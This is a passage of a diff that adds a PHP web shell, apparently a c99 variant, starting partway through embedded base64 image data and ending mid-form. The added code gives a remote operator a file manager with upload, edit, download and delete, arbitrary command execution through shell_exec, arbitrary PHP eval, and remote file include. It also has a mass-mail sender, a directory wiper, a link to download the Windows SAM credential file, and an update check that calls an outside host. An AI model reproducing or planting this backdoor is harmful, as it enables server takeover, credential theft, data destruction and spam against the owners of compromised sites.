++zXfZrvs132a77Nd9mu+zXfZrvs132a77Nd9mu+zXfZrvs132a77Nd9hDoCEIDJH0YKJQIKsDpgW
+BfgWUacgTAkoAgLreSxYtgGTAgEigAAvbnQJqy1XRBCSCWEVMchsge1InEoImkEAkMAH/sdKetgQ
+kASVTK8FiNrM/AhGUmWFC84tGEEIJ5RFIeaZNEkqJGAtGH9aGVEkQK9iYINvSQJEWxHx2GpQBhIZ
+Bwa5prvsetQWpqEgLI4+OzcwGApE5roM4Eu/YDCCBAMieFfBZSsOoDACQEHAbkYf0IZUWIX6nQJO
+w62AFEGLNU+OxSbDMMAANgOKD/1AqpAOSsWwMaELlEEQCYKpJE9qwuJkvAWgb+ClcKADkz4Up5Qz
+TxEJQAcyJrvsqBdIAhhBpJzmdAkR8IeVKsg9DCCV0agEguPOgXgsWiK8GNikQ4KIUpBfAIBQg4hg
+UfXgsdzaMhkEYAkEs+4YONNACBEVI48oB1UQAmcCjixmu+zXfZrvs132a77Nd9mu+zXfZrvs132a
+77Nd9mu+zXfZrvs132a77M4vHcD0bsgCNLS0tLS0tLS0tLS0tLS0tLS0tIQCaCCAiIIRIYxgGAAE
+DASu6kMCYrUEwf3KKyAa4AFNgEfJ07XjXnEUNgCkGnjzgoF87YASAqpafa6qSEAUEPAOQwIwUTBq
+M4GXOYNycAq0VeCVEHAwaqASwJA3vKOkSCoKklVYxMho3wRgMTBArTKiAKJDmW1ZMYNg04tgNRQA
+GRfqJaO7aLDIEaRCItkwsQioJeCRUlgMCuoUccoQc7MHmIirHwSa3ykQMExEkVRUH0VJkoAfoePN
+LB4gFFJyQcCcfBIXbhwohAYUGGRgsMQ9QNhxcYrSACA4olyporJJQTAYmCrSWztEgkcivHkkjWVT
+KECVLCNI5BU2AAEisiJBB8eTTWGAFQEBAOhizrgQGlgEml44rQwwYrgUMIDTlBFQzCyW1RRpsEBM
+llACB+vB1rBwQDohIMs84NBEfCBQcNho4ThDyEQUlvwUCNLS0tLS0tLS0tLS0tLS0tLS32X3K0CG
+YwXud1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1
+yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3
+XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yn
+dcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcpi/Yhm9z//2gAI
+AQIDAT8Q/rB//9oACAEDAwE/EP6wf//Z");
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  echo base64_decode($images[$_GET['pic']]);
+}
+
+$ps=str_replace("\\","/",getenv('DOCUMENT_ROOT'));
+//file_array
+$file_tps=array(
+"img"=>array("jpg","bmp","gif","ico"),
+"act" => array("edit","copy","download","delete"),
+"zip" => array("gzip","zip","rar")
+);
+$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; //Self url
+}
+$surl = htmlspecialchars($surl);
+ @ob_clean();
+//end
+if (isset($_GET['img'])) {
+   for ($i=0;$i<4;$i++) {
+     if (preg_match("/".$file_tps["img"][$i]."/i",$extn)) {
+    header("Content-type: ".$inf["mime"]);
+    readfile(urldecode($filename));
+    exit;
+
+     }
+ }
+}
+
+
+if (!function_exists(download)) {
+   function download($file) {
+   header('Pragma: anytextexeptno-cache', true);
+      header('Content-type: application/force-download');
+          header('Content-Transfer-Encoding: Binary');
+              header('Content-length: '.filesize($file));
+                  header('Content-disposition: attachment;
+                      filename='.basename($file));
+                          readfile($file);
+                          exit;
+   }
+}
+if (isset($_GET['download'])) {
+download($filename);
+exit;
+}
+
+if (isset($_GET['run'])) {
+echo urldecode($_GET['file']);
+include(urldecode($_GET['file']));
+exit;
+}
+
+
+function check_update() 
+{
+$cur_ver=5; //very important value for updates!Please dont change!
+$newer=$cur_ver+1;
+$url="http://dc3.dl.am/";
+$file=@fopen($url."".$newer.".txt","r") or die ("No updates aviable!");
+$text=fread($file,1000000);
+if (preg_match("/ver=".$newer."/i", $text)) {
+   echo "[+]Update Aviable!...Please download new version from:";
+echo "<br><a href=".$url.$newer.".txt>Version ".$newer."</a>";
+} }
+
+function get_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+echo  $type.join("",$owner).join("",$group).join("",$world);
+}
+
+
+
+if (!function_exists(get_space)) {
+   function get_space($dir) {
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_f = @round(48.7/($all/$free),2);
+echo "".$used_f."";
+     }
+ }
+$sys=strtolower(substr(PHP_OS,0,3));
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+echo "<img  src=".$surl."?&".$word."&dir&pic=o.b height= width=>";
+echo getenv('SERVER_SOFTWARE');
+echo "<br>";
+echo getenv('SERVER_NAME');
+echo ":";
+echo getenv('SERVER_PORT');
+echo "<br>";
+echo getenv('SERVER_ADMIN');
+
+if ($sys=="win") {
+echo "Windows";
+echo "<br>";
+echo  "".getenv('COMPUTERNAME')."";
+echo "<br>";
+echo "Os:".getenv('OS')."";
+} else {
+echo "<br>Linux";
+}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+$safe=1;
+echo "<br><font color=red>ON (secure)</font>";
+ } else {
+$save=2;
+if ($sys=="win") {
+echo "<br><font color=green><a href=".$surl."?&".$word."&file_browser&file=C:/Windows/repair/sam&download>Off (not secure)</a></font>";
+}
+}
+if (isset($_GET['file']))  {
+echo "<br>Access:";
+if (@is_readable($j_f)) {
+   echo "R";
+}
+if (@is_executable($j_f)) {
+ echo "E";
+}
+if (@is_writable($j_d)) {
+echo "W";
+}
+echo "<br>Current_file:";
+echo "<a href=".$surl."?&".$word."&file_browser&file=";
+echo urlencode($p) ;
+echo ">".$p."</a>";
+ }
+echo "<br>";
+echo "Start_dir:";
+echo "&ensp;&ensp;&ensp;";
+echo "<a href=".$surl."?&".$word."&file_browser&file=";
+echo urlencode($ps);
+echo ">".$ps."</a>";
+echo "<br>";
+if (isset($_GET['file'])) {
+echo "Free Space:";
+get_space(urldecode($_GET['file']));
+
+echo "gb";
+}
+echo "</td>";
+?>
+
+<style type="text/css">
+body { background-color:#8B8989;font-family:trebuchet Ms; color:black }
+
+textarea {
+border-top-width: 1px; 
+font-weight: bold; 
+border-left-width: 1px; 
+font-size: 10px; 
+border-left-color: #8B8989; 
+background:#8B8989; 
+border-bottom-width: 1px; 
+border-bottom-color:#8B8989; 
+color: black; 
+border-top-color:#8B8989; 
+font-family: trebuchet Ms; 
+border-right-width: 1px; 
+border-right-color: #8B8989;
+}
+input {
+border-top-width: 1px; 
+font-weight: bold; 
+border-left-width: 1px; 
+font-size: 10px; 
+border-left-color: #8B8989; 
+background: #8B8989; 
+border-bottom-width: 1px; 
+border-bottom-color: #8B8989; 
+color: black; 
+border-top-color:#8B8989; 
+font-family: trebuchet Ms; 
+border-right-width: 1px; 
+border-right-color:#8B8989;
+}
+td {
+    font-size: 10px; 
+    font-family: verdana;
+}
+th {
+    font-size: 10px; 
+    font-family: verdana;
+}
+a:link {
+    text-decoration: none;
+}
+a:visited {
+    text-decoration: none;
+        color:blue;
+}
+a:active {
+    text-decoration: none;
+}
+a:hover {
+    color: #00ff00; 
+    text-decoration: none;
+}
+back {
+background-color:grey;
+}
+ ul#Navigation {
+position:absolute;
+    width: 10em;
+    margin: 0; padding: 0.8em;
+    border: 1px solid #8B8989;
+    background-color: #8B8989;
+  }
+  * html ul#Navigation {  /* Korrekturen fuer IE 5.x */
+    width: 11.6em;
+    w\idth: 10em;
+    padding-left: 0;
+    padd\ing-left: 0.8em;
+  }
+  ul#Navigation li {
+    list-style: none;
+    margin: 0.4em; padding: 0;
+  }
+
+  ul#Navigation a {
+    display:block;
+    padding: 0.2em;
+    text-decoration: none; font-weight: bold;
+    border: 1px solid black;
+    border-left-color: black; border-top-color: black;
+    color: black; background-color: #8B8989;
+  }
+  * html ul#Navigation a {  /* Breitenangaben nur fuer IE */
+    width: 100%;
+    w\idth: 8.8em;
+  }
+  ul#Navigation a:hover {
+    border-color: white;
+    border-left-color: black; border-top-color: black;
+    color: white; background-color: #8B8989;
+  }
+</style>
+
+<?php
+if (!function_exists(rename_all)) {
+    function rename_all($dir,$prefix,$name,$del) {
+     $r_dir=opendir($dir);
+       while (false !== ($file_r = readdir($r_dir))) {
+         if (@filetype($dir."/".$file_r)=="file") {
+           $i++;
+        @copy($dir."/".$file_r,$dir."/".$i.".".$prefix.$name) or die ("[-]Error renaming file : ".$file_r."");
+         if ($del=="yes") {
+          @unlink($dir."/".$file_r) or die ("[-]Error deleting file(s)!");
+        }
+       }
+       
+      }
+       echo "Successfully renamed file(s)!";
+    }
+  }
+        
+        
+
+if (!function_exists(get_perms)) {
+     function get_perms($file) {
+    if (@file_exists($file)) {
+      if (@is_readable($file)) {
+        echo "<b>R</b>";
+         }
+           if (@is_executable($file)) {
+            echo "<b>E</b>";
+             }
+               if (@is_writable($file)) {
+                echo "<b>W</b>";
+                }
+              } else {
+                 echo "[-]Error";
+               }
+            }
+          }
+
+if (!function_exists(search_file)) {
+   function search_file($search,$dir) {
+    global $word;
+     global $surl;
+    $d_s=opendir($dir);
+    while (false !== ($file_s = readdir($d_s))) {
+      if (preg_match("/".$search."/i",$file_s))   {
+         echo "<a href=".$surl."?&".$word."&file_browser&file=".urlencode($dir)."/".urlencode($file_s).">".$file_s."</a><br>";
+         }
+       }
+     }
+   }
+
+
+if (!function_exists(copy_file)) {
+    function copy_file($file,$to) {
+   if (@file_exists($file)) {
+     @copy($file,$to) or die ("[-]Error copying file!");
+      echo "Successfully copied file!";
+       } else {
+           echo "[-]File Doesnt exist!";
+       }
+    }
+ }
+
+if (!function_exists(send_mail)) {
+   function send_mail($from,$to,$text,$subject,$times) {
+              while ($i<$times) {
+               $i++;
+               $header  = "From: $from\r\n";    
+                @mail($to, $subject, $text, $header) or die ("[-]Error sending mail(s)!");
+
+              }
+                   echo "Successfully sent mail(s) to ".$to."!";
+   }
+ }
+
+
+if (!function_exists(read_file)) {
+   function read_file($file) {
+$file=@fopen($file,"r");
+echo fread($file,10000);
+fclose($file);
+       }
+     }
+
+if (!function_exists(write_file)) {
+   function write_file($file,$text) {
+     if (@is_writable($file)) {
+      if (@file_exists($file)) {
+        $file_w=@fopen(urldecode($file),"w") or die ("[-]Error");
+         if (fwrite($file_w,$text)) {
+            echo "Successfully written to file(s)!";
+          }
+        }
+     }
+           else {
+           echo "[-]Error";
+            exit;
+     }
+   }
+ }
+      
+
+
+if (!function_exists(count_all)) {
+     function count_all($dir) {
+       $c_d=opendir($dir);
+        while (false !== ($file_c = readdir($c_d))) {
+         if (@filetype($dir."/".$file_c)=="file") {
+            $file_c_s++;
+         } 
+           else 
+         { 
+            $dir_c++;
+         }
+        }
+       echo "Directories:";
+        echo $dir_c++;
+         echo "||";
+          echo "Files:";
+            echo $file_c_s;
+     }
+}
+
+if (!function_exists(check_access)) {
+   function check_access($file) {
+     if (@is_readable($file)) {
+       echo "R";
+        }
+         if (@is_executable($file)) {
+           echo "E";
+             } 
+              if (@is_writable($file)) {
+                echo "W"; 
+                 }
+              } 
+           }
+
+if (!function_exists(clear_dir)) {
+   function clear_dir($dir) {
+$o_d=opendir($dir);
+   while (false !== ($file = readdir($o_d))) {
+    if (@filetype(urldecode($_GET['file'])."/".$file)=="file") {
+unlink(urldecode($dir)."/".$file) or die ("[-]Error @ file:".$file."");
+   }
+ }
+echo "Successfully cleared directory!";
+   }
+ }
+
+?>
+
+
+<?php
+// real code start !
+
+
+if (isset($_GET['update'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+check_update();
+exit;
+}
+if (isset($_GET['rmdir']))  {
+echo "<center><table border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+@rmdir($_GET['file']) or die ("[-]Error deleting dir!");
+echo "Successfully deleted dir(s)!";
+exit;
+}
+
+
+if (isset($_GET['upload'])) {
+$uploaddir = urldecode($_POST['file']);
+
+print "<pre>";
+if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir ."/". $_FILES['userfile']['name'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+   print "Successfully uploadet file(s)!";
+} else {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+   print "[-]Error";
+}
+exit;
+}
+
+if (isset($_GET['search'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+
+    <tr><td>";
+search_file($_POST['search'],urldecode($_POST['dir']));
+exit;
+}
+
+
+
+
+if (isset($_GET['getenv'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+echo getenv($_GET['getenv']);
+exit;
+}
+
+
+if (isset($_GET['php_info'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+phpinfo();
+exit;
+}
+
+if (isset($_GET['defined_vars'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+echo "<center><textarea rows=40 cols=120>";
+$vars=get_defined_vars();
+print_r($vars);
+echo "</textarea>";
+
+exit;
+}
+
+if (isset($_GET['env'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead><br>
+    <tr><td>";
+$ary=get_defined_vars();
+$it=array_keys($ary);
+foreach ($it as $i) {
+echo "<a href=".$surl."?&".$word."&getenv=".$i.">".$i."</a><br>";
+
+}
+exit;
+}
+
+if (isset($_GET['play'])) {
+echo "<embed src=".urlencode($filename)." autostart=true loop=true hidden=true height=0 width=0>";
+exit;
+}
+
+
+if (isset($_GET['special_crypt'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+echo "<textarea rows=15 cols=90>";
+if (isset($_POST['submit'])) {
+$file=@fopen($_FILES['userfile']['tmp_name'],"r") or die ("[-]Error reading file!");
+$meth=$_POST['crypt'];
+if ($meth=="1") {
+echo htmlspecialchars(md5(fread($file,10000)));
+ } elseif ($meth=="2") {
+      echo htmlspecialchars(crypt(fread($file,10000)));
+}
+    elseif ($meth=="3") {
+     echo htmlspecialchars(sha1(fread($file,10000)));
+  }
+elseif ($meth=="4") {
+     echo htmlspecialchars(crc32(fread($file,10000)));
+}
+   elseif ($meth=="5") {
+     echo htmlspecialchars(urlencode(fread($file,10000)));
+}
+
+   elseif ($meth=="6") {
+     echo htmlspecialchars(urldecode(fread($file,10000)));
+}
+   elseif ($meth=="7") {
+     echo htmlspecialchars(base64_encode(fread($file,10000)));
+}
+
+elseif ($meth=="8") {
+     echo htmlspecialchars(base64_decode(fread($file,10000)));
+}
+
+}
+echo "</textarea><div align=left>";
+
+?>
+<form enctype="multipart/form-data" action=<?php echo $surl ?>&<?php echo $word ?>&special_crypt method="post">
+file: <input name="userfile" type="file"><br><br>
+
+<input type="submit" value="Start" name="submit"><br>
+<input type=radio name=crypt value=1>md5();<br>
+<input type=radio name=crypt value=2>crypt();<br>
+<input type=radio name=crypt value=3>sha1();<br>
+<input type=radio name=crypt value=4>crc32();<br>
+<input type=radio name=crypt value=5>urlencode();<br>
+<input type=radio name=crypt value=6>urldecode();<br>
+<input type=radio name=crypt value=7>base64_encode();<br>
+<input type=radio name=crypt value=5>base64_decode();<br>
+
+<?php
+exit;
+}
+if (isset($_GET['crypt'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&crypt method="post">
+Crypt:<br>
+<textarea rows=12 cols=120 name=crypt>
+</textarea>
+<?php
+$text=$_POST['crypt'];
+?>
+md5:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(md5($text)) ?>><br><br>
+
+crypt:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(crypt($text)) ?>><br><br>
+
+sha1:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(sha1($text)) ?>><br><br>
+
+crc32:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(crc32($text)) ?>><br><br>
+
+urlencode:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo  htmlspecialchars(urlencode($text)) ?>><br><br>
+
+urldecode:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(urldecode($text)) ?>><br><br>
+
+base64_encode:&ensp;<input type=text size=40 value=<?php echo base64_encode($text) ?>><br><br>
+
+base64_decode:&ensp;<input type=text size=40 value=<?php echo base64_decode($text) ?>><br><br>
+<?php
+echo "<input type=submit value=Start></form><form action=".$surl."?&".$word."&special_crypt method=post><input type=submit value=file_inload_crypt>";
+exit;
+}
+
+if (isset($_GET['php_code'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&php_code method="post">
+
+<textarea rows=12 cols=120 name=code>
+</textarea>
+<textarea rows=12 cols=120 readonly>
+<?php
+eval($_POST['code']);
+echo "</textarea>";
+echo "<br><br><input type=submit value=Start>";
+exit;
+}
+
+if (isset($_GET['search_st'])) {
+   if (isset($_POST['search'])) {
+search_file($_POST['search'],$_POST['dir']);
+ }
+exit;
+}
+
+
+if (isset($_GET['rename_all'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+rename_all(urldecode($_POST['d']),$_POST['prefix'],$_POST['name'],$_POST['del']);
+exit;
+}
+
+if (isset($_GET['special_d'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+ $way=$_POST['way'];
+   if ($way=="1") {
+clear_dir($_GET['file']);
+   exit;
+  }
+    if ($way=="2") {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&rename_all method="post">
+Prefix:<br><input type="text" name="prefix"><br>
+Name:<br><input type="text" name="name"><br>
+<input type="hidden" name="d" value=<?php echo urlencode($filename) ?>>
+Delete old files?:<input type="radio" name="del" value="yes"><br>
+<br><input type="submit" value="Rename">
+<?php
+exit;
+}
+}
+
+
+if (isset($_GET['special_dir'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+?>
+
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&special_d&file=<?php echo urlencode($filename) ?> method=post>
+<input type="radio" name="way" value="1">Clear Dir<input type=hidden name=dir value=<?php echo urlencode($filename) ?>><br><br>
+<input type="radio" name="way" value="2">Rename with prefix<br><br>
+<input type="submit" name="sub" value="Start">
+<?php
+exit;
+}
+
+if (isset($_GET['delete'])) {
+   if (@file_exists($filename)) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+    @unlink($filename) or die ("[-]Error deleting file!");
+     echo "Successfully Deleted File!";
+      exit;
+   }
+}
+
+if (isset($_GET['save'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+     write_file(urldecode($_POST['file']),stripslashes($_POST['text']));
+   
+   exit;
+}
+
+if (isset($_GET['exec'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td><center>";
+@chdir(urldecode($_POST['dir']));
+echo "<textarea rows=15 cols=114>";
+echo shell_exec($_POST['command']);
+echo "</textarea>";
+exit;
+}
+
+
+if (isset($_GET['mkdir'])) {
+   if (isset($_POST['name'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+     mkdir(urldecode($_POST['dir'])."/".$_POST['name']) or die ("[-]Error creating dir!");
+     echo "Successfully created dir!";
+   }
+exit;
+}
+
+if (isset($_GET['mkfile'])) {
+   if (isset($_POST['name'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+$dir=urldecode($_POST['dir']);
+$filed=$_POST['name'];
+
+       if (@file_exists($dir."/".$filed)) {
+     echo "[-]Allready exists!";
+      exit;
+     }
+    $file_c=@fopen($dir."/".$filed,"w") or die ("[-]Can't create file!");
+     echo "Scuessfully created file(s)!";
+   }
+exit;
+}
+
+if (isset($_GET['edit'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+   if (@file_exists($filename)) {
+     echo "<form action=".$surl."?&".$word."&save method=post><textarea rows=15 cols=90 name=text>";
+      read_file($filename);
+       echo "</textarea><br><br><input type=hidden name=file value=".urlencode($_GET['file'])."><input type=submit name=sub value=Save>";
+       }
+    exit;
+}
+
+
+
+if (isset($_GET['copy_start'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+copy_file($_POST['from'],$_POST['to']);
+exit;
+}
+
+
+
+if (isset($_GET['copy_file']))  {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&copy_start method="post">
+New:<br><textarea rows=4 cols=70 name="to"><?php echo realpath($filename) ?></textarea><br><br>
+Old:<br><textarea rows=4 cols=70 name="from"><?php echo realpath($filename) ?></textarea><br><br>
+<input type="submit" name="sub" value="Copy">
+<?php
+exit;
+}
+
+if (isset($_GET['send_mail_st'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+
+    <tr><td>";
+if (isset($_POST['from'])) 
+{
+if (isset($_POST['to'])) 
+{
+if (isset($_POST['text'])) 
+{
+if (isset($_POST['subject']))
+{
+if (isset($_POST['times']))
+{
+send_mail($_POST['from'],$_POST['to'],$_POST['text'],$_POST['subject'],$_POST['times'])  ; 
+exit;
+}
+}
+}
+}
+}
+}
+if (isset($_GET['send_mail'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&send_mail_st method="post">
+From:&ensp;&ensp;&ensp;&ensp;<input type="text" name="from"><br><br>
+To:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="text" name="to"><br><br>
+Subject:&ensp;&ensp;<input type="text" name="subject"><br><br>
+Times:&ensp;&ensp;&ensp;<input type="text" name="times"><br><br>
+
+Text:<br><textarea rows=15 cols=60 name="text"></textarea><br><br>
+<input type="submit" name="sub" value="Send!">
+<?php
+exit;
+}
+if (isset($_GET['file_browser'])) {
+
+   for ($i=0;$i<4;$i++) {
+     if (preg_match("/".$file_tps["img"][$i]."/i",$extn)) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+     echo "<a href=".$surl."?&".$word."&file_browser&file=".urlencode($filename)."&img><img src='".urldecode($surl)."?&".$word."&file=".urldecode($filename)."&img' height= width= border=0><br>";
+  exit;
+}  }
+
+
+
+if (@filetype($j_f)=="file") {
+echo "<center><table border=\"1\" rules=\"groups\" 
+  <thead>
+    <tr><td>";
+highlight_file($j_f);
+
+exit;
+}
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+
+      <th></th><td>";
+count_all($j_d);
+echo "</tr>";
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+      <th>Filename</th><th>Edit</th><th>Copy</th><th>Download</th><th>Delete<th>Perms</th><th>Access</th> ";
+
+
+
+
+$o_d=opendir($j_d);
+
+
+
+   while (false !== ($file = readdir($o_d))) {
+     echo " <tbody>
+
+    <tr>
+      <td>";
+if (@filetype($j_d."/".$file)=="dir") {
+echo "</a><img  src=".$surl."?&".$word."&dir&pic=dir height=12 width=><a href=".$surl."&".$word."&&file_browser&file=".urlencode($j_d)."/".urlencode($file).">[".$file."]";
+} else {
+echo "<img  src=".$surl."?&".$word."&dir&pic=ext_wri height=9 width=><a href=".$surl."&".$word."&&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+echo $file;
+}
+echo "<br></a></td><td><a href=".$surl."&".$word."&edit&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Edit]";
+}
+else {
+echo "</a><center>[-]";
+}
+echo "</a></td><td><a href=".$surl."&".$word."&copy_file&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Copy]";
+} else {
+echo "</a><center>[-]";
+}
+echo "</a></td><td><a href=".$surl."&".$word."&download&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Download]";
+} else {
+echo "</a><center>[-]";
+}
+echo "</a></td><td><a href=".$surl."&".$word."&delete&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Delete]";
+} else {
+echo "</a><center><a href=".$surl."&".$word."&rmdir&file_browser&file=".urlencode($j_d)."/".urlencode($file).">[Delete]</a>";
+} 
+echo "<td><center>";
+echo @fileowner($j_f."/".$file);
+echo "</td>";
+echo "<td><center>";
+get_perms(fileperms($j_f."/".$file));
+echo "</td>";
+echo "</a></td>";
+ }
+echo "<center><table width=360 height=40 border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form enctype="multipart/form-data" action=<?php echo $surl ?>&<?php echo $word ?>&upload method="post">
+file: &ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input name="userfile" type="file">
+<input type="hidden" name="file" value=<?php echo urlencode($_GET['file']) ?>>
+<input type="submit" value="Upload"><br><br><?php
+if (@is_writable($j_d)) {
+echo "<font color=green>[Ok]</font>";
+  } else {
+echo "<font color=red>[No]</font>";
+ }
+?>
+</form>
+
+<?php
+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&search method="post">
+search: &ensp;&ensp;&ensp;&ensp;<input name="search" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="Search">
+</form>
+<?php
+
+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+  <thead>
+
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&mkdir method="post">
+name: &ensp;&ensp;&ensp;&ensp;&ensp;<input name="name" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="mkdir">
+</form>
